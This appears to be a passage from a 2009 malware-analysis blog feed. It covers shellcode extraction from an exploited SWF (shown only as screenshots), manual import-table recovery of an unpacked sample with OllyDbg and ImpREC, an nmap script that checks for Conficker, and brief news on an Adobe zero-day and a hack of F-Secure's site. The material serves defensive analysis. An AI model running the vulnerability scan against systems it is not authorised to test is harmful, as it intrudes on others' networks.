href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRkic240983iRqi1bSF8uQcgMOXRHJ-HRKI2a6HaVPLcsKktlSGfbhfTG0H8UGrpvG6tGtREi78L9-qKIhNF8Z0oaI8ANEyWc-S9TsRm_sINS9K77BOixhUf3DBh2xMo0v5Kp1J_TFLLzH/s1600-h/shellcode_2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 286px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRkic240983iRqi1bSF8uQcgMOXRHJ-HRKI2a6HaVPLcsKktlSGfbhfTG0H8UGrpvG6tGtREi78L9-qKIhNF8Z0oaI8ANEyWc-S9TsRm_sINS9K77BOixhUf3DBh2xMo0v5Kp1J_TFLLzH/s320/shellcode_2.JPG" alt="" id="BLOGGER_PHOTO_ID_5339410062810872482" border="0" /></a><br />So we should find offset from <span style="font-weight: bold;">aa 02 34 d1 </span>to <span style="font-weight: bold;">11 67 8a 37</span> using your any hex editors as you like:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEoO42nK-IRuGa8l0TBH2YGNA5ABM14rC3elk101J6QPDLs2zii-EOb11zf-ERAIr8lUwfU_p0bWxhldMwkDxMpHhd8Lv5Ii-aFMnP5koSHNPvRmCl3R4jMqQhUuSuYPUhaeHK6Pxvmpto/s1600-h/shellcode_3.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 314px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEoO42nK-IRuGa8l0TBH2YGNA5ABM14rC3elk101J6QPDLs2zii-EOb11zf-ERAIr8lUwfU_p0bWxhldMwkDxMpHhd8Lv5Ii-aFMnP5koSHNPvRmCl3R4jMqQhUuSuYPUhaeHK6Pxvmpto/s320/shellcode_3.JPG" alt="" id="BLOGGER_PHOTO_ID_5339411742442573666" border="0" /></a><br />continuation:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCasx7OkmTj4Sj8yAirHFhaBl3in4-BdQIJgNb1MMRLOaIifbAQebQ_vNuRjbRK8ivax42ME5JLzgSfdRFHgampmtAfisUtr_Qd2ermwVnDK6UUxc-ViqutH8sdrmNXgsIN0MextqZlHHO/s1600-h/shellcode_3_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 314px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCasx7OkmTj4Sj8yAirHFhaBl3in4-BdQIJgNb1MMRLOaIifbAQebQ_vNuRjbRK8ivax42ME5JLzgSfdRFHgampmtAfisUtr_Qd2ermwVnDK6UUxc-ViqutH8sdrmNXgsIN0MextqZlHHO/s320/shellcode_3_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5339412186279816418" border="0" /></a><br />And the obfuscated shellcode looks like this:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRQH1LtOFyGoxxxOfG_onIRnk2CciPfCqZ-ivXaau6wMtB0GTDxLnAGC6c6PbHIizELNW8ock5rOVpvE_zF0m3fpvVKcvVGCkqPcvDQQgFOLvnUuPsne05JHCT8N6lc5XrzzotnM6Y-ggB/s1600-h/shellcode_obfuscated.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 285px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRQH1LtOFyGoxxxOfG_onIRnk2CciPfCqZ-ivXaau6wMtB0GTDxLnAGC6c6PbHIizELNW8ock5rOVpvE_zF0m3fpvVKcvVGCkqPcvDQQgFOLvnUuPsne05JHCT8N6lc5XrzzotnM6Y-ggB/s320/shellcode_obfuscated.JPG" alt="" id="BLOGGER_PHOTO_ID_5341472945517848386" border="0" /></a><br /><br /><span style="font-weight: bold;">Conclusion</span><br /><br />We got the shellcode from the exploited SWF but we still do not know what its payloads. In the next section, I will explain how to deofuscate the shellcode by looking for the "key" in order to deobfuscate it and some common techniques used in shellcode like using PEB to find the kernel32.dll and then looking for the address of LoadLibrary to load the necessary APIs in order to execute its payload.<br /><br /><br />To be continued...x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com3tag:blogger.com,1999:blog-1022731470813881575.post-53226426741172887142009-04-04T10:51:00.011+08:002009-07-21T19:08:03.106+08:00Manual IAT Recovery Using ImpRECThere are a lot of tutorial on the Internet teaching how to use ImpREC to recover Import Address Table (IAT). But those tutorials are only covered using the "Auto IAT Search" function by Imprec. The "auto" function is not able to fully recover the IAT like this:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWbVZx_0bL7J2qR8ehxEPKyttNcTv1eqZRmdm857EojNH-drJEbLvFN5rWDUpe0BAjViJ0Lq8GmhtzmnhIkDpkU7_16J45sz0Xh4XN2gUecb22TCeUlwLSU0CtbRcJot0-Kpm31S2x25Ml/s1600-h/idapro_unresolv.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 154px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWbVZx_0bL7J2qR8ehxEPKyttNcTv1eqZRmdm857EojNH-drJEbLvFN5rWDUpe0BAjViJ0Lq8GmhtzmnhIkDpkU7_16J45sz0Xh4XN2gUecb22TCeUlwLSU0CtbRcJot0-Kpm31S2x25Ml/s320/idapro_unresolv.JPG" alt="" id="BLOGGER_PHOTO_ID_5320670027046390306" border="0" /></a><br />How do we determine these are the unresolved APIs? Try using OllyDbg, find the OEP, it is fairly easy to find it if the sample was packed by UPX ;) , and <span style="font-weight: bold;">Follow in Dump -> Memory Address</span> to any API's call, for example:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic1WFT9-z1t4LqCloH2YQnwbMvkzodttsH8lBcTU5J1OvXymOSLpV1KmdVaeARIQpiTwTDx4yxeMdnioKpyevW_iXiAVGqd7n4JUSbHHwArjFpklCg4FNHrOnx_V7lMYkH7MCp8V79_mS5/s1600-h/ollydbg_follow_in_dump.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 204px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic1WFT9-z1t4LqCloH2YQnwbMvkzodttsH8lBcTU5J1OvXymOSLpV1KmdVaeARIQpiTwTDx4yxeMdnioKpyevW_iXiAVGqd7n4JUSbHHwArjFpklCg4FNHrOnx_V7lMYkH7MCp8V79_mS5/s320/ollydbg_follow_in_dump.JPG" alt="" id="BLOGGER_PHOTO_ID_5320672064411588402" border="0" /></a><br />Now in the <span style="font-weight: bold;">Memory Dump </span>window, switch to <span style="font-weight: bold;">Address </span>view and then you can see the list of APIs:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTaPNe9xbEHgfC7y1cfp7vvrJb2eq-B2GwHLlny1FlRNj3g1Er6FRMtFEKnYzEv9w3FRgL-9HMKXMaWg2MASLbDZwQOTjGeQFC-7KK4ApdEK5Rn87iviU35C7v7BDH2dYP85RinFwwvAy5/s1600-h/ollydb_address_view.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 223px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTaPNe9xbEHgfC7y1cfp7vvrJb2eq-B2GwHLlny1FlRNj3g1Er6FRMtFEKnYzEv9w3FRgL-9HMKXMaWg2MASLbDZwQOTjGeQFC-7KK4ApdEK5Rn87iviU35C7v7BDH2dYP85RinFwwvAy5/s320/ollydb_address_view.JPG" alt="" id="BLOGGER_PHOTO_ID_5320672901347688098" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsBqrcaW00hVKwi5wChBZ0I5MZWj9YMYFXfKxVwRYapx2ocqEPC3DwJvF_xieE9Xh0KFTo6KejuUO8OfiSEwBsbfZ15HS0OwBnc9dxljDvW1RbEytc4sb6K3SIrTpJFSAkQwbekVN6rdVE/s1600-h/ollydbg_list_apis.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 223px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsBqrcaW00hVKwi5wChBZ0I5MZWj9YMYFXfKxVwRYapx2ocqEPC3DwJvF_xieE9Xh0KFTo6KejuUO8OfiSEwBsbfZ15HS0OwBnc9dxljDvW1RbEytc4sb6K3SIrTpJFSAkQwbekVN6rdVE/s320/ollydbg_list_apis.JPG" alt="" id="BLOGGER_PHOTO_ID_5320673792574057906" border="0" /></a><br />These are the IAT that we missed just now when loading it to IDA. So the next thing is to recover this so that we can continue static analysis on IDA. Scroll up until 0 byte memory address which is beginning IAT relative virtual Address (491cc) and scroll down until 0 byte memory address which is the ending IAT relative virtual address (49338).<br /><br />Dump the sample using OllyDump, then we can start ImpREC to recover the IAT using the starting RVA we found just now. Using the <span style="font-weight: bold;">AutoSearch </span>button will give us:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTIWimzBE4L4SxoOaIUMyuqe1KqjisM23UcZNOlwj9WNGLGwQlo0kRdNGr5Bcxbx5K-Md0IH-c8ZDvZXdSUVbr8hWLJDAGA_goq4eTW5Oe108LJwzRTqbIWQqXTHRuz16bfnhuWSXJXl0l/s1600-h/imprec_iat_autosearch.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 317px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTIWimzBE4L4SxoOaIUMyuqe1KqjisM23UcZNOlwj9WNGLGwQlo0kRdNGr5Bcxbx5K-Md0IH-c8ZDvZXdSUVbr8hWLJDAGA_goq4eTW5Oe108LJwzRTqbIWQqXTHRuz16bfnhuWSXJXl0l/s320/imprec_iat_autosearch.JPG" alt="" id="BLOGGER_PHOTO_ID_5320678006248303474" border="0" /></a><br />Notice that the original IAT RVA found at 49284 seems to be incorrect. If you fix the dump with this option you will see the unresolved APIs as shown in the first figure. So we need to set the <span style="font-weight: bold;">OEP</span>, <span style="font-weight: bold;">RVA </span>and <span style="font-weight: bold;">Size </span><span>(49338-491cc)</span> manually and select <span style="font-weight: bold;">Get Imports</span>:<br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuXMcJ_58aMOhCJEeqAaSfPowF4ZthpOaDwinks7Bbzm6WZ-z84hZrVOyocpBT7O4WSQL5KdFxvcpYaNtllrNzOv93sX1oYRAHi2ho3TfO3euwBVAEwLTvX8kBHbfMNVVLSG7jgfk69pgg/s1600-h/imprec_recover_iat.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 317px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuXMcJ_58aMOhCJEeqAaSfPowF4ZthpOaDwinks7Bbzm6WZ-z84hZrVOyocpBT7O4WSQL5KdFxvcpYaNtllrNzOv93sX1oYRAHi2ho3TfO3euwBVAEwLTvX8kBHbfMNVVLSG7jgfk69pgg/s320/imprec_recover_iat.JPG" alt="" id="BLOGGER_PHOTO_ID_5320683428748432866" border="0" /></a>We can now fix the dump using <span style="font-weight: bold;">Fix Dump</span> button, select the file that was dumped by OllDbg just now. Done! Next we can load to IDA and see the result:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-EoViZB9gFx8YuHITTSHhaI9MHs7wsPShY0pMUJml2OK85uWcwW980sK5SL83rrbU5upQuPouRphSaL4fge1BOdOFdTKyzJsRsen5NKvASOdCJ0DeL7ccm9oMWX2e4muk8h36G1mX_BE/s1600-h/idapro_resolv.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 155px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-EoViZB9gFx8YuHITTSHhaI9MHs7wsPShY0pMUJml2OK85uWcwW980sK5SL83rrbU5upQuPouRphSaL4fge1BOdOFdTKyzJsRsen5NKvASOdCJ0DeL7ccm9oMWX2e4muk8h36G1mX_BE/s320/idapro_resolv.JPG" alt="" id="BLOGGER_PHOTO_ID_5320684970118184146" border="0" /></a><br />Signing off<br />~x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com3tag:blogger.com,1999:blog-1022731470813881575.post-20673202403495582932009-04-01T19:59:00.000+08:002009-04-01T20:48:14.222+08:00Customd Detection and Removal ToolA big april fool worm was setup to be activated today, but it seems that the worm get many security expert disappointed. There are no major havoc caused by this worm yet (at least at the time of writting this blog 12:05 GMT).<br /><br />For those who suspect their PC is infected with this machine, the easiest way to find out is by visiting some security related websites for example:<br /><br /><ul><li>www.symantec.com</li><li>www.microsoft.com</li><li>www.macfee.com</li><li>www.f-secure.com</li></ul>and etc.<br /><br />Conficker/Downadup was designed to block the infected machine from visiting these security websites to prevent victims to find solution to remove this worm. For more technical details on how it prevents from visitng the websites (hooking the Windows API <span style="font-style: italic;">DnsQuery</span> from dnsapi.dll) :<br /><br /><a href="http://mtc.sri.com/Conficker/addendumC/">http://mtc.sri.com/Conficker/addendumC/</a> <-- This is so far the most consolidated analysis that I have ever seen :) The following website is the consolidated methods of detection and removal for Conficker/Downadup from <span style="font-style: italic;">dShield</span>:<br /><br /><br /><a href="http://www.dshield.org/diary.html?storyid=5860">http://www.dshield.org/diary.html?storyid=5860</a><br /><br /><br /><span style="font-weight: bold;">Using Nmap to Perform Conficker Test</span><br /><br />I was attracted by the new Nmap scanning features which include the script to scan your network to test if you are infected with the Conficker, thanks to Honeynet Project (Tillmann Werner and Felix Leder) :D<br /><br /><span style="font-weight: bold;">nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [host]</span><br /><br />typical scan result for infected machine:<br /><br /><blockquote>Host script results:<br />| smb-check-vulns:<br />| MS08-067: FIXED<br />| Conficker: Likely INFECTED<br />|_ regsvc DoS: VULNERABLE</blockquote><br />The testing was done using <a href="http://nmap.ucsd.edu/nmap/dist/nmap-4.85BETA6-win32.zip"><span style="font-weight: bold;">Nmap4.85BETA6</span></a><br /><br />Signing off<br />~x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-71312988191842344672009-03-01T20:46:00.001+08:002009-07-21T19:09:08.680+08:00Adobe Reader 9 and Acrobat 9 0Day VulnerabilityAdobe Reader 9 and Acrobat 9 found to be vulnerable to a 0day exploit where Adobe is planning to release the patches on 11th March 2009:<br /><br /><a href="http://secunia.com/blog/44/">http://secunia.com/blog/44/</a><br /><br />In the first place, the security specialist said that users can be protected by disabling the Javascript on Adobe, which can be found here:<br /><br /><a href="http://www.4shared.com/file/90132463/a01aa640/Adobe_JS_Fix.html">http://www.4shared.com/file/90132463/a01aa640/Adobe_JS_Fix.html</a><br /><br /><br />Lately security specialist from Secunia reported that disabling the Javascript cannot eliminate all the risk, more information can be found here:<br /><br /><a href="http://www.adobe.com/support/security/advisories/apsa09-01.html">http://www.adobe.com/support/security/advisories/apsa09-01.html</a><br /><br /><span style="font-weight: bold;">Conclusion</span><br /><br />The only mitigation is avoid opening PDF document from unknown source or cross the finger to wait the 11th March 2009 to reach :)x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com0tag:blogger.com,1999:blog-1022731470813881575.post-10840741596251252772009-02-12T05:38:00.001+08:002009-07-21T19:10:37.584+08:00Now is F-Secure??Another security company, F-Secure who has the same fate as Kaspersky, was hacked today. However the hacker claimed that there was no sensitive information leaked for this time.<br /><br />More information:<br /><br /><a href="http://hackersblog.org/2009/02/11/f-securecom-sql-injection-cross-site-scripting/">http://hackersblog.org/2009/02/11/f-securecom-sql-injection-cross-site-scripting/</a><br /><a href="http://www.theregister.co.uk/2009/02/11/psystart_website/">http://www.theregister.co.uk/2009/02/11/psystart_website/</a>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com0